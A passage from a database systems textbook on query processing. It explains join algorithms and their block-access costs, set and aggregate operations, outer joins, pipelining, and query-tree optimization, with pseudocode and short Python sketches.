in memory, the number of blocks read in from the file can be adjusted.

How Buffer Space and Choice of Outer-Loop File Affect Performance of
Nested-Loop Join. The buffer space available has an important effect on some of
the join algorithms. First, let us consider the nested-loop approach (J1). Looking
again at the operation OP6 above, assume that the number of buffers available in
main memory for implementing the join is nB = 7 blocks (buffers). Recall that we
assume that each memory buffer is the same size as one disk block. For illustration,
assume that the DEPARTMENT file consists of rD = 50 records stored in bD = 10 disk
blocks and that the EMPLOYEE file consists of rE = 6000 records stored in bE = 2000
disk blocks. It is advantageous to read as many blocks as possible at a time into
memory from the file whose records are used for the outer loop (that is, nB − 2
blocks). The algorithm can then read one block at a time for the inner-loop file and
use its records to probe (that is, search) the outer-loop blocks that are currently in
main memory for matching records. This reduces the total number of block
accesses. An extra buffer in main memory is needed to contain the resulting records
after they are joined, and the contents of this result buffer can be appended to the
result file—the disk file that will contain the join result—whenever it is filled. This
result buffer block then is reused to hold additional join result records.
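A compact sketch of this buffering strategy, assuming each file is represented in
memory as a list of blocks (each block a list of record dictionaries); the helper name
nested_block_join and the attribute names in the usage comment are illustrative:

def nested_block_join(outer_blocks, inner_blocks, outer_attr, inner_attr, nB):
    """Block nested-loop join: load (nB - 2) outer blocks at a time, then scan the
    inner file one block at a time and probe the resident outer records; one buffer
    is reserved for the current inner block and one for the result records."""
    result = []
    chunk = nB - 2
    for i in range(0, len(outer_blocks), chunk):
        # (nB - 2) blocks of the outer-loop file currently held in memory
        resident = [t for block in outer_blocks[i:i + chunk] for t in block]
        for inner_block in inner_blocks:          # one inner-loop block at a time
            for s in inner_block:
                for t in resident:
                    if t[outer_attr] == s[inner_attr]:
                        result.append({**t, **s})  # joined record
    return result

# OP6 with DEPARTMENT as the outer-loop file (the file with fewer blocks):
# nested_block_join(department_blocks, employee_blocks, "Dnumber", "Dno", nB=7)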


(a) sort the tuples in R on attribute A; (* assume R has n tuples (records) *)
    sort the tuples in S on attribute B; (* assume S has m tuples (records) *)
    set i ← 1, j ← 1;
    while (i ≤ n) and (j ≤ m)
    do { if R(i)[A] > S(j)[B]
            then set j ← j + 1
         elseif R(i)[A] < S(j)[B]
            then set i ← i + 1
         else { (* R(i)[A] = S(j)[B], so we output a matched tuple *)
                output the combined tuple <R(i), S(j)> to T;

                (* output other tuples that match R(i), if any *)
                set l ← j + 1;
                while (l ≤ m) and (R(i)[A] = S(l)[B])
                do { output the combined tuple <R(i), S(l)> to T;
                     set l ← l + 1
                   }

                (* output other tuples that match S(j), if any *)
                set k ← i + 1;
                while (k ≤ n) and (R(k)[A] = S(j)[B])
                do { output the combined tuple <R(k), S(j)> to T;
                     set k ← k + 1
                   }
                set i ← k, j ← l
              }
       }

(b) create a tuple t[<attribute list>] in T′ for each tuple t in R;
    (* T′ contains the projection results before duplicate elimination *)
    if <attribute list> includes a key of R
       then T ← T′
       else { sort the tuples in T′;
              set i ← 1, j ← 2;
              while i ≤ n
              do { output the tuple T′[i] to T;
                   while T′[i] = T′[j] and j ≤ n do j ← j + 1; (* eliminate duplicates *)
                   i ← j; j ← i + 1
                 }
            }
    (* T contains the projection result after duplicate elimination *) (continues)

Figure 3
Implementing JOIN, PROJECT, UNION, INTERSECTION, and SET DIFFERENCE by
using sort-merge, where R has n tuples and S has m tuples. (a) Implementing the
operation T ← R ⋈A=B S. (b) Implementing the operation T ← π<attribute list>(R).


(c) sort the tuples in R and S using the same unique sort attributes;
    set i ← 1, j ← 1;
    while (i ≤ n) and (j ≤ m)
    do { if R(i) > S(j)
            then { output S(j) to T;
                   set j ← j + 1
                 }
         elseif R(i) < S(j)
            then { output R(i) to T;
                   set i ← i + 1
                 }
         else set j ← j + 1 (* R(i) = S(j), so we skip one of the duplicate tuples *)
       }
    if (i ≤ n) then add tuples R(i) to R(n) to T;
    if (j ≤ m) then add tuples S(j) to S(m) to T;

(d) sort the tuples in R and S using the same unique sort attributes;
    set i ← 1, j ← 1;
    while (i ≤ n) and (j ≤ m)
    do { if R(i) > S(j)
            then set j ← j + 1
         elseif R(i) < S(j)
            then set i ← i + 1
         else { output R(j) to T; (* R(i) = S(j), so we output the tuple *)
                set i ← i + 1, j ← j + 1
              }
       }

(e) sort the tuples in R and S using the same unique sort attributes;
    set i ← 1, j ← 1;
    while (i ≤ n) and (j ≤ m)
    do { if R(i) > S(j)
            then set j ← j + 1
         elseif R(i) < S(j)
            then { output R(i) to T; (* R(i) has no matching S(j), so output R(i) *)
                   set i ← i + 1
                 }
         else set i ← i + 1, j ← j + 1
       }
    if (i ≤ n) then add tuples R(i) to R(n) to T;

Figure 3 (continued)
Implementing JOIN, PROJECT, UNION, INTERSECTION, and SET DIFFERENCE by
using sort-merge, where R has n tuples and S has m tuples. (c) Implementing the
operation T ← R ∪ S. (d) Implementing the operation T ← R ∩ S. (e) Implementing
the operation T ← R – S.

In the nested-loop join, it makes a difference which file is chosen for the outer loop
and which for the inner loop. If EMPLOYEE is used for the outer loop, each block of
EMPLOYEE is read once, and the entire DEPARTMENT file (each of its blocks) is read
once for each time we read in (nB – 2) blocks of the EMPLOYEE file. We get the
following formulas for the number of disk blocks that are read from disk to main
memory:

Total number of blocks accessed (read) for outer-loop file = bE
Number of times (nB − 2) blocks of outer file are loaded into main memory
   = ⎡bE/(nB – 2)⎤
Total number of blocks accessed (read) for inner-loop file = bD * ⎡bE/(nB – 2)⎤

Hence, we get the following total number of block read accesses:

bE + ( ⎡bE/(nB – 2)⎤ * bD) = 2000 + ( ⎡(2000/5)⎤ * 10) = 6000 block accesses

On the other hand, if we use the DEPARTMENT records in the outer loop, by
symmetry we get the following total number of block accesses:

bD + ( ⎡bD/(nB – 2)⎤ * bE) = 10 + ( ⎡(10/5)⎤ * 2000) = 4010 block accesses

The join algorithm uses a buffer to hold the joined records of the result file. Once
the buffer is filled, it is written to disk and its contents are appended to the result
file, and then refilled with join result records.10

10If we reserve two buffers for the result file, double buffering can be used to speed the algorithm.

If the result file of the join operation has bRES disk blocks, each block is written
once to disk, so an additional bRES block accesses (writes) should be added to the
preceding formulas in order to estimate the total cost of the join operation. The
same holds for the formulas developed later for other join algorithms. As this
example shows, it is advantageous to use the file with fewer blocks as the outer-loop
file in the nested-loop join.

How the Join Selection Factor Affects Join Performance. Another factor
that affects the performance of a join, particularly the single-loop method J2, is the
fraction of records in one file that will be joined with records in the other file. We
call this the join selection factor11 of a file with respect to an equijoin condition
with another file. This factor depends on the particular equijoin condition between
the two files. To illustrate this, consider the operation OP7, which joins each
DEPARTMENT record with the EMPLOYEE record for the manager of that
department. Here, each DEPARTMENT record (there are 50 such records in our
example) will be joined with a single EMPLOYEE record, but many EMPLOYEE
records (the 5,950 of them that do not manage a department) will not be joined
with any record from DEPARTMENT.

11This is different from the join selectivity, which we will discuss in Section 8.

Suppose that secondary indexes exist on both the attributes Ssn of EMPLOYEE and
Mgr_ssn of DEPARTMENT, with the number of index levels xSsn = 4 and
xMgr_ssn = 2, respectively. We have two options for implementing method J2.
The first retrieves each EMPLOYEE record and then uses the index on Mgr_ssn of
DEPARTMENT to find a matching DEPARTMENT record. In this case, no matching
record will be found for employees who do not manage a department. The number
of block accesses for this case is approximately:

bE + (rE * (xMgr_ssn + 1)) = 2000 + (6000 * 3) = 20,000 block accesses

The second option retrieves each DEPARTMENT record and then uses the index on
Ssn of EMPLOYEE to find a matching manager EMPLOYEE record. In this case, every
DEPARTMENT record will have one matching EMPLOYEE record. The number of
block accesses for this case is approximately:

bD + (rD * (xSsn + 1)) = 10 + (50 * 5) = 260 block accesses

The second option is more efficient because the join selection factor of
DEPARTMENT with respect to the join condition Ssn = Mgr_ssn is 1 (every record in
DEPARTMENT will be joined), whereas the join selection factor of EMPLOYEE with
respect to the same join condition is (50/6000), or 0.008 (only 0.8 percent of the
records in EMPLOYEE will be joined). For method J2, either the smaller file or the
file that has a match for every record (that is, the file with the high join selection
factor) should be used in the (single) join loop. It is also possible to create an index
specifically for performing the join operation if one does not already exist.

The sort-merge join J3 is quite efficient if both files are already sorted by their join
attribute. Only a single pass is made through each file. Hence, the number of blocks
accessed is equal to the sum of the numbers of blocks in both files. For this method,
both OP6 and OP7 would need bE + bD = 2000 + 10 = 2010 block accesses. However,
both files are required to be ordered by the join attributes; if one or both are not, a
sorted copy of each file must be created specifically for performing the join
operation. If we roughly estimate the cost of sorting an external file by (b log2 b)
block accesses, and if both files need to be sorted, the total cost of a sort-merge join
can be estimated by (bE + bD + bE log2 bE + bD log2 bD).12

12We can use the more accurate formulas from Section 2 if we know the number of available buffers for
sorting.

General Case for Partition-Hash Join. The hash-join method J4 is also quite
efficient. In this case only a single pass is made through each file, whether or not the
files are ordered. If the hash table for the smaller of the two files can be kept entirely
in main memory after hashing (partitioning) on its join attribute, the
implementation is straightforward. If, however, the partitions of both files must be
stored on disk, the method becomes more complex, and a number of variations to
improve the efficiency have been proposed. We discuss two techniques: the general
case of partition-hash join and a variation called hybrid hash-join algorithm, which
has been shown to be quite efficient.

In the general case of partition-hash join, each file is first partitioned into M
partitions using the same partitioning hash function on the join attributes. Then,
each pair of corresponding partitions is joined. For example, suppose we are joining
relations R and S on the join attributes R.A and S.B:

R ⋈A=B S

In the partitioning phase, R is partitioned into the M partitions R1, R2, ..., RM, and
S into the M partitions S1, S2, ..., SM. The property of each pair of corresponding
partitions Ri, Si with respect to the join operation is that records in Ri only need to
be joined with records in Si, and vice versa. This property is ensured by using the
same hash function to partition both files on their join attributes—attribute A for R
and attribute B for S. The minimum number of in-memory buffers needed for the
partitioning phase is M + 1. Each of the files R and S are partitioned separately.
During partitioning of a file, M in-memory buffers are allocated to store the records
that hash to each partition, and one additional buffer is needed to hold one block at
a time of the input file being partitioned. Whenever the in-memory buffer for a
partition gets filled, its contents are appended to a disk subfile that stores the
partition. The partitioning phase has two iterations. After the first iteration, the first
file R is partitioned into the subfiles R1, R2, ..., RM, where all the records that hashed
to the same buffer are in the same partition. After the second iteration, the second
file S is similarly partitioned.

In the second phase, called the joining or probing phase, M iterations are needed.
During iteration i, two corresponding partitions Ri and Si are joined. The minimum
number of buffers needed for iteration i is the number of blocks in the smaller of
the two partitions, say Ri, plus two additional buffers. If we use a nested-loop join
during iteration i, the records from the smaller of the two partitions Ri are copied
into memory buffers; then all blocks from the other partition Si are read—one at a
time—and each record is used to probe (that is, search) partition Ri for matching
record(s). Any matching records are joined and written into the result file. To
improve the efficiency of in-memory probing, it is common to use an in-memory
hash table for storing the records in partition Ri by using a different hash function
from the partitioning hash function.13

We can approximate the cost of this partition hash-join as 3 * (bR + bS) + bRES for
our example, since each record is read once and written back to disk once during
the partitioning phase. During the joining (probing) phase, each record is read a
second time to perform the join. The main difficulty of this algorithm is to ensure
that the partitioning hash function is uniform—that is, the partition sizes are nearly
equal in size. If the partitioning function is skewed (nonuniform), then some
partitions may be too large to fit in the available memory space for the second
joining phase.

Notice that if the available in-memory buffer space nB > (bR + 2), where bR is the
number of blocks for the smaller of the two files being joined, say R, then there is no
reason to do partitioning since in this case the join can be performed entirely in
memory using some variation of the nested-loop join based on hashing and probing.

13If the hash function used for partitioning is used again, all records in a partition will hash to the same
bucket again.


For illustration, assume we are performing the join operation OP6, repeated below:

OP6: EMPLOYEE ⋈Dno=Dnumber DEPARTMENT

In this example, the smaller file is the DEPARTMENT file; hence, if the number of
available memory buffers nB > (bD + 2), the whole DEPARTMENT file can be read
into main memory and organized into a hash table on the join attribute. Each
EMPLOYEE block is then read into a buffer, and each EMPLOYEE record in the buffer
is hashed on its join attribute and is used to probe the corresponding in-memory
bucket in the DEPARTMENT hash table. If a matching record is found, the records
are joined, and the result record(s) are written to the result buffer and eventually to
the result file on disk. The cost in terms of block accesses is hence (bD + bE), plus
bRES—the cost of writing the result file.
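In code, this whole-file-in-memory case reduces to a single build-and-probe pass; the
sketch below assumes DEPARTMENT and EMPLOYEE are lists of dictionaries with
Dnumber and Dno fields, as in OP6:

def hash_join_small_build(department, employee):
    """OP6 when DEPARTMENT fits in memory: build a hash table on Dnumber, probe with Dno."""
    table = {}
    for d in department:                   # one pass over DEPARTMENT (bD block reads)
        table.setdefault(d["Dnumber"], []).append(d)
    result = []
    for e in employee:                     # one pass over EMPLOYEE (bE block reads)
        for d in table.get(e["Dno"], []):
            result.append({**e, **d})      # joined record, eventually written to the result file
    return result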

Hybrid Hash-Join. The hybrid hash-join algorithm is a variation of partition
hash-join, where the joining phase for one of the partitions is included in the
partitioning phase. To illustrate this, let us assume that the size of a memory buffer
is one disk block; that nB such buffers are available; and that the partitioning hash
function used is h(K) = K mod M, so that M partitions are being created, where M
< nB. For illustration, assume we are performing the join operation OP6. In the
first pass of the partitioning phase, when the hybrid hash-join algorithm is
partitioning the smaller of the two files (DEPARTMENT in OP6), the algorithm
divides the buffer space among the M partitions such that all the blocks of the first
partition of DEPARTMENT completely reside in main memory. For each of the
other partitions, only a single in-memory buffer—whose size is one disk block—is
allocated; the remainder of the partition is written to disk as in the regular
partition-hash join. Hence, at the end of the first pass of the partitioning phase, the
first partition of DEPARTMENT resides wholly in main memory, whereas each of
the other partitions of DEPARTMENT resides in a disk subfile.

For the second pass of the partitioning phase, the records of the second file being
joined—the larger file, EMPLOYEE in OP6—are being partitioned. If a record
hashes to the first partition, it is joined with the matching record in DEPARTMENT
and the joined records are written to the result buffer (and eventually to disk). If an
EMPLOYEE record hashes to a partition other than the first, it is partitioned
normally and stored to disk. Hence, at the end of the second pass of the partitioning
phase, all records that hash to the first partition have been joined. At this point,
there are M − 1 pairs of partitions on disk. Therefore, during the second joining or
probing phase, M − 1 iterations are needed instead of M. The goal is to join as many
records as possible during the partitioning phase so as to save the cost of storing
those records on disk and then rereading them a second time during the joining
phase.

4 Algorithms for PROJECT and Set Operations

A PROJECT operation π<attribute list>(R) is straightforward to implement if
<attribute list> includes a key of relation R, because in this case the result of the operation will


have the same number of tuples as R, but with only the values for the attributes in
<attribute list> in each tuple. If <attribute list> does not include a key of R, duplicate
tuples must be eliminated. This can be done by sorting the result of the operation and
then eliminating duplicate tuples, which appear consecutively after sorting. A sketch
of the algorithm is given in Figure 3(b). Hashing can also be used to eliminate dupli-
cates: as each record is hashed and inserted into a bucket of the hash file in memory,
it is checked against those records already in the bucket; if it is a duplicate, it is not
inserted in the bucket. It is useful to recall here that in SQL queries, the default is not
to eliminate duplicates from the query result; duplicates are eliminated from the
query result only if the keyword DISTINCT is included.
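A sketch of the hashing-based duplicate elimination just described, using a Python
set as the in-memory hash file (the helper name project and the example attribute
list are illustrative):

def project(records, attrs):
    """PROJECT with duplicate elimination: a projected tuple is inserted only if an
    identical tuple is not already present in the hash buckets."""
    seen = set()
    result = []
    for r in records:
        t = tuple(r[a] for a in attrs)
        if t not in seen:          # duplicate check against the bucket contents
            seen.add(t)
            result.append(t)
    return result

# project(EMPLOYEE, ["Dno", "Sex"]) keeps one tuple per distinct (Dno, Sex) combination.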

Set operations—UNION, INTERSECTION, SET DIFFERENCE, and CARTESIAN
PRODUCT—are sometimes expensive to implement. In particular, the CARTESIAN
PRODUCT operation R × S is quite expensive because its result includes a record for
each combination of records from R and S. Also, each record in the result includes
all attributes of R and S. If R has n records and j attributes, and S has m records and
k attributes, the result relation for R × S will have n * m records and each record will
have j + k attributes. Hence, it is important to avoid the CARTESIAN PRODUCT
operation and to substitute other operations such as join during query optimization
(see Section 7).

The other three set operations—UNION, INTERSECTION, and SET
DIFFERENCE14—apply only to type-compatible (or union-compatible) relations,
which have the same number of attributes and the same attribute domains. The cus-
tomary way to implement these operations is to use variations of the sort-merge
technique: the two relations are sorted on the same attributes, and, after sorting, a
single scan through each relation is sufficient to produce the result. For example, we
can implement the UNION operation, R ∪ S, by scanning and merging both sorted
files concurrently, and whenever the same tuple exists in both relations, only one is
kept in the merged result. For the INTERSECTION operation, R ∩ S, we keep in the
merged result only those tuples that appear in both sorted relations. Figure 3(c) to
(e) sketches the implementation of these operations by sorting and merging. Some
of the details are not included in these algorithms.

Hashing can also be used to implement UNION, INTERSECTION, and SET DIFFER-
ENCE. One table is first scanned and then partitioned into an in-memory hash table
with buckets, and the records in the other table are then scanned one at a time and
used to probe the appropriate partition. For example, to implement R ∪ S, first hash
(partition) the records of R; then, hash (probe) the records of S, but do not insert
duplicate records in the buckets. To implement R ∩ S, first partition the records of
R to the hash file. Then, while hashing each record of S, probe to check if an identi-
cal record from R is found in the bucket, and if so add the record to the result file. To
implement R – S, first hash the records of R to the hash file buckets. While hashing
(probing) each record of S, if an identical record is found in the bucket, remove that
record from the bucket.

14SET DIFFERENCE is called EXCEPT in SQL.
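The hashing-based versions just outlined can be sketched as follows, with whole
tuples used as hash keys and a Python set standing in for the in-memory hash file
buckets (the relations are assumed to be duplicate-free, as for traditional sets):

def hash_union(R, S):
    """R ∪ S: partition R into the hash table, then probe with S, skipping duplicates."""
    buckets = set(R)
    return list(buckets | set(S))

def hash_intersection(R, S):
    """R ∩ S: keep an S-record only if an identical R-record is found in its bucket."""
    buckets = set(R)
    return [t for t in S if t in buckets]

def hash_difference(R, S):
    """R – S: hash R, then remove from the buckets every record matched by an S-record."""
    buckets = set(R)
    for t in S:
        buckets.discard(t)
    return list(buckets)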


In SQL, there are two variations of these set operations. The operations UNION,
INTERSECTION, and EXCEPT (the SQL keyword for the SET DIFFERENCE opera-
tion) apply to traditional sets, where no duplicate records exist in the result. The
operations UNION ALL, INTERSECTION ALL, and EXCEPT ALL apply to multisets (or
bags), and duplicates are fully considered. Variations of the above algorithms can be
used for the multiset operations in SQL. We leave these as an exercise for the reader.

5 Implementing Aggregate Operations
and OUTER JOINs

5.1 Implementing Aggregate Operations
The aggregate operators (MIN, MAX, COUNT, AVERAGE, SUM), when applied to an
entire table, can be computed by a table scan or by using an appropriate index, if
available. For example, consider the following SQL query:

SELECT MAX(Salary)
FROM EMPLOYEE;

If an (ascending) B+-tree index on Salary exists for the EMPLOYEE relation, then the
optimizer can decide on using the Salary index to search for the largest Salary value
in the index by following the rightmost pointer in each index node from the root to
the rightmost leaf. That node would include the largest Salary value as its last entry.
In most cases, this would be more efficient than a full table scan of EMPLOYEE, since
no actual records need to be retrieved. The MIN function can be handled in a similar
manner, except that the leftmost pointer in the index is followed from the root to
leftmost leaf. That node would include the smallest Salary value as its first entry.
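A schematic sketch of this index-only computation of MAX, assuming a minimal
B+-tree node representation (the class and field names are invented for
illustration):

class BPlusNode:
    """Minimal B+-tree node: internal nodes keep child pointers, leaves keep (key, record_ptr) entries."""
    def __init__(self, keys, children=None, entries=None):
        self.keys = keys
        self.children = children      # non-None for internal nodes
        self.entries = entries        # non-None for leaf nodes

def index_max(root):
    """Follow the rightmost pointer in each node from the root down to the rightmost
    leaf; its last entry holds the largest indexed value (e.g., MAX(Salary))."""
    node = root
    while node.children is not None:
        node = node.children[-1]
    return node.entries[-1][0]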

The index could also be used for the AVERAGE and SUM aggregate functions, but
only if it is a dense index—that is, if there is an index entry for every record in the
main file. In this case, the associated computation would be applied to the values in
the index. For a nondense index, the actual number of records associated with each
index value must be used for a correct computation. This can be done if the number
of records associated with each value in the index is stored in each index entry. For the
COUNT aggregate function, the number of values can be also computed from the
index in a similar manner. If a COUNT(*) function is applied to a whole relation, the
number of records currently in each relation is typically stored in the catalog, and
so the result can be retrieved directly from the catalog.

When a GROUP BY clause is used in a query, the aggregate operator must be applied
separately to each group of tuples as partitioned by the grouping attribute. Hence,
the table must first be partitioned into subsets of tuples, where each partition
(group) has the same value for the grouping attributes. In this case, the computa-
tion is more complex. Consider the following query:

SELECT Dno, AVG(Salary)
FROM EMPLOYEE
GROUP BY Dno;

The usual technique for such queries is to first use either sorting or hashing on the
grouping attributes to partition the file into the appropriate groups. Then the algo-
rithm computes the aggregate function for the tuples in each group, which have the
same grouping attribute(s) value. In the sample query, the set of EMPLOYEE tuples
for each department number would be grouped together in a partition and the aver-
age salary computed for each group.

Notice that if a clustering index exists on the grouping attribute(s), then the
records are already partitioned (grouped) into the appropriate subsets. In this case,
it is only necessary to apply the computation to each group.
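
A minimal hash-based grouping sketch for the sample query above (illustrative only; a
real implementation operates on disk blocks and may use sorting instead when there are
too many groups to hold in memory):

from collections import defaultdict

def group_avg(employee_rows):
    # employee_rows: iterable of (Dno, Salary) pairs.
    sums = defaultdict(float)
    counts = defaultdict(int)
    for dno, salary in employee_rows:        # one pass partitions the rows by Dno
        sums[dno] += salary
        counts[dno] += 1
    # One result tuple per group, as in SELECT Dno, AVG(Salary) ... GROUP BY Dno.
    return [(dno, sums[dno] / counts[dno]) for dno in sums]

rows = [(5, 30000), (5, 40000), (4, 25000), (4, 43000), (1, 55000)]
print(group_avg(rows))   # [(5, 35000.0), (4, 34000.0), (1, 55000.0)]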

5.2 Implementing OUTER JOINs
The outer join operation has three variations: left outer join, right outer join, and full
outer join. These operations can be specified in SQL. The following is an example of
a left outer join operation in SQL:

SELECT Lname, Fname, Dname
FROM (EMPLOYEE LEFT OUTER JOIN DEPARTMENT ON Dno=Dnumber);

The result of this query is a table of employee names and their associated depart-
ments. It is similar to a regular (inner) join result, with the exception that if an
EMPLOYEE tuple (a tuple in the left relation) does not have an associated department,
the employee’s name will still appear in the resulting table, but the department
name would be NULL for such tuples in the query result.

Outer join can be computed by modifying one of the join algorithms, such as
nested-loop join or single-loop join. For example, to compute a left outer join, we
use the left relation as the outer-loop relation (nested-loop join) or as the single-loop
relation, because every tuple in the left relation must appear in the result. If there
are matching tuples in the other relation,
the joined tuples are produced and saved in the result. However, if no matching
tuple is found, the tuple is still included in the result but is padded with NULL
value(s). The sort-merge and hash-join algorithms can also be extended to compute
outer joins.
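
A nested-loop sketch of the left outer join just described, with unmatched left tuples
padded with NULLs (None in Python); the attribute positions and sample relations below
are hypothetical and only serve to illustrate the padding step.

def left_outer_join(left, right, left_key, right_key, pad_width):
    # left, right: lists of tuples; left_key/right_key: positions of the join
    # attributes; pad_width: number of attributes of the right relation.
    result = []
    for l in left:                          # the left relation drives the outer loop
        matched = False
        for r in right:
            if l[left_key] == r[right_key]:
                result.append(l + r)        # produce the joined tuple
                matched = True
        if not matched:
            result.append(l + (None,) * pad_width)   # pad with NULL values
    return result

employee = [('Smith', 'John', 5), ('Borg', 'James', None)]
department = [(5, 'Research'), (4, 'Administration')]
print(left_outer_join(employee, department, left_key=2, right_key=0, pad_width=2))
# Smith joins with Research; Borg has no department and is padded with NULLs.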

Theoretically, outer join can also be computed by executing a combination of rela-
tional algebra operators. For example, the left outer join operation shown above is
equivalent to the following sequence of relational operations:

1. Compute the (inner) JOIN of the EMPLOYEE and DEPARTMENT tables.

TEMP1 ← πLname, Fname, Dname (EMPLOYEE ⋈Dno=Dnumber DEPARTMENT)

2. Find the EMPLOYEE tuples that do not appear in the (inner) JOIN result.

TEMP2 ← πLname, Fname (EMPLOYEE) – πLname, Fname (TEMP1)

3. Pad each tuple in TEMP2 with a NULL Dname field.

TEMP2 ← TEMP2 × NULL

4. Apply the UNION operation to TEMP1, TEMP2 to produce the LEFT OUTER
JOIN result.

RESULT ← TEMP1 ∪ TEMP2

The cost of the outer join as computed above would be the sum of the costs of the
associated steps (inner join, projections, set difference, and union). However, note
that step 3 can be done as the temporary relation is being constructed in step 2; that
is, we can simply pad each resulting tuple with a NULL. In addition, in step 4, we
know that the two operands of the union are disjoint (no common tuples), so there
is no need for duplicate elimination.

6 Combining Operations Using Pipelining
A query specified in SQL will typically be translated into a relational algebra expres-
sion that is a sequence of relational operations. If we execute a single operation at a
time, we must generate temporary files on disk to hold the results of these tempo-
rary operations, creating excessive overhead. Generating and storing large tempo-
rary files on disk is time-consuming and can be unnecessary in many cases, since
these files will immediately be used as input to the next operation. To reduce the
number of temporary files, it is common to generate query execution code that cor-
responds to algorithms for combinations of operations in a query.

For example, rather than being implemented separately, a JOIN can be combined
with two SELECT operations on the input files and a final PROJECT operation on
the resulting file; all this is implemented by one algorithm with two input files and a
single output file. Rather than creating four temporary files, we apply the algorithm
directly and get just one result file. In Section 7.2, we discuss how heuristic rela-
tional algebra optimization can group operations together for execution. This is
called pipelining or stream-based processing.

It is common to create the query execution code dynamically to implement multiple
operations. The generated code for producing the query combines several algo-
rithms that correspond to individual operations. As the result tuples from one oper-
ation are produced, they are provided as input for subsequent operations. For
example, if a join operation follows two select operations on base relations, the
tuples resulting from each select are provided as input for the join algorithm in a
stream or pipeline as they are produced.
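
A generator-based sketch of pipelined execution: each operator pulls tuples from the
operator below it as they are needed, so no intermediate file is materialized. The
operators, column positions, and predicates below are illustrative assumptions, not
code from the text.

def select(rows, predicate):
    for row in rows:                 # yield qualifying tuples one at a time
        if predicate(row):
            yield row

def nested_loop_join(outer, inner, match):
    inner = list(inner)              # the inner side is buffered once
    for o in outer:                  # outer tuples arrive from the pipeline
        for i in inner:
            if match(o, i):
                yield o + i

def project(rows, positions):
    for row in rows:
        yield tuple(row[p] for p in positions)

# SELECT ... FROM R, S WHERE R.a > 10 AND R.b = S.b, executed as one pipeline:
R = [(12, 'x'), (7, 'y'), (15, 'y')]
S = [('x', 100), ('y', 200)]
plan = project(
    nested_loop_join(select(R, lambda r: r[0] > 10),
                     S,
                     lambda r, s: r[1] == s[0]),
    positions=[0, 3])
print(list(plan))                    # [(12, 100), (15, 200)]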

7 Using Heuristics in Query Optimization
In this section we discuss optimization techniques that apply heuristic rules to
modify the internal representation of a query—which is usually in the form of a
query tree or a query graph data structure—to improve its expected performance.
The scanner and parser of an SQL query first generate a data structure that corre-
sponds to an initial query representation, which is then optimized according to
heuristic rules. This leads to an optimized query representation, which corresponds
to the query execution strategy. Following that, a query execution plan is generated
to execute groups of operations based on the access paths available on the files
involved in the query.

One of the main heuristic rules is to apply SELECT and PROJECT operations before
applying the JOIN or other binary operations, because the size of the file resulting
from a binary operation—such as JOIN—is usually a multiplicative function of the
sizes of the input files. The SELECT and PROJECT operations reduce the size of a file
and hence should be applied before a join or other binary operation.

In Section 7.1 we discuss query tree and query graph notations in the context of
relational algebra and calculus. These can be used as the basis for the data structures
that are used for internal representation of queries. A query tree is used to represent
a relational algebra or extended relational algebra expression, whereas a query graph
is used to represent a relational calculus expression. Then in Section 7.2 we show how
heuristic optimization rules are applied to convert an initial query tree into an
equivalent query tree, which represents a different relational algebra expression
that is more efficient to execute but gives the same result as the original tree. We also
discuss the equivalence of various relational algebra expressions. Finally, Section 7.3
discusses the generation of query execution plans.

7.1 Notation for Query Trees and Query Graphs
A query tree is a tree data structure that corresponds to a relational algebra expres-
sion. It represents the input relations of the query as leaf nodes of the tree, and rep-
resents the relational algebra operations as internal nodes. An execution of the
query tree consists of executing an internal node operation whenever its operands
are available and then replacing that internal node by the relation that results from
executing the operation. The order of execution of operations starts at the leaf nodes,
which represent the input database relations for the query, and ends at the root
node, which represents the final operation of the query. The execution terminates
when the root node operation is executed and produces the result relation for the
query.

Figure 4a shows a query tree: For every project located in ‘Stafford’, retrieve the proj-
ect number, the controlling department number, and the department manager’s last
name, address, and birthdate. This query is specified on the COMPANY relational
schema in Figure A.1 and corresponds to the following relational algebra expres-
sion:

πPnumber, Dnum, Lname, Address, Bdate (((σPlocation=‘Stafford’(PROJECT))
⋈Dnum=Dnumber (DEPARTMENT)) ⋈Mgr_ssn=Ssn (EMPLOYEE))

This corresponds to the following SQL query:

Q2: SELECT P.Pnumber, P.Dnum, E.Lname, E.Address, E.Bdate
FROM PROJECT AS P, DEPARTMENT AS D, EMPLOYEE AS E
WHERE P.Dnum=D.Dnumber AND D.Mgr_ssn=E.Ssn AND

P.Plocation= ‘Stafford’;

Figure 4
Two query trees for the query Q2. (a) Query tree corresponding to the relational algebra
expression for Q2. (b) Initial (canonical) query tree for SQL query Q2. (c) Query graph for Q2.

In Figure 4a, the leaf nodes P, D, and E represent the three relations PROJECT,
DEPARTMENT, and EMPLOYEE, respectively, and the internal tree nodes represent
the relational algebra operations of the expression. When this query tree is executed,
the node marked (1) in Figure 4a must begin execution before node (2) because
some resulting tuples of operation (1) must be available before we can begin execut-
ing operation (2). Similarly, node (2) must begin executing and producing results
before node (3) can start execution, and so on.

As we can see, the query tree represents a specific order of operations for executing
a query. A more neutral data structure for representation of a query is the query
graph notation. Figure 4c shows the query graph for query Q2. Relations in the
query are represented by relation nodes, which are displayed as single circles.
Constant values, typically from the query selection conditions, are represented by
constant nodes, which are displayed as double circles or ovals. Selection and join
conditions are represented by the graph edges, as shown in Figure 4c. Finally, the
attributes to be retrieved from each relation are displayed in square brackets above
each relation.

The query graph representation does not indicate an order in which to perform the
operations. There is only a single graph corresponding to each query.15 Although
some optimization techniques were based on query graphs, it is now generally
accepted that query trees are preferable because, in practice, the query optimizer
needs to show the order of operations for query execution, which is not possible in
query graphs.

7.2 Heuristic Optimization of Query Trees
In general, many different relational algebra expressions—and hence many different
query trees—can be equivalent; that is, they can represent the same query.16

The query parser will typically generate a standard initial query tree to correspond
to an SQL query, without doing any optimization. For example, for a SELECT-
PROJECT-JOIN query, such as Q2, the initial tree is shown in Figure 4(b). The
CARTESIAN PRODUCT of the relations specified in the FROM clause is first applied;
then the selection and join conditions of the WHERE clause are applied, followed by
the projection on the SELECT clause attributes. Such a canonical query tree repre-
sents a relational algebra expression that is very inefficient if executed directly,
because of the CARTESIAN PRODUCT (×) operations. For example, if the PROJECT,
DEPARTMENT, and EMPLOYEE relations had record sizes of 100, 50, and 150 bytes
and contained 100, 20, and 5,000 tuples, respectively, the result of the CARTESIAN
PRODUCT would contain 10 million tuples of record size 300 bytes each. However,
the initial query tree in Figure 4(b) is in a simple standard form that can be easily
created from the SQL query. It will never be executed. The heuristic query opti-
mizer will transform this initial query tree into an equivalent final query tree that is
efficient to execute.

The optimizer must include rules for equivalence among relational algebra expres-
sions that can be applied to transform the initial tree into the final, optimized query
tree. First we discuss informally how a query tree is transformed by using heuristics,
and then we discuss general transformation rules and show how they can be used in
an algebraic heuristic optimizer.

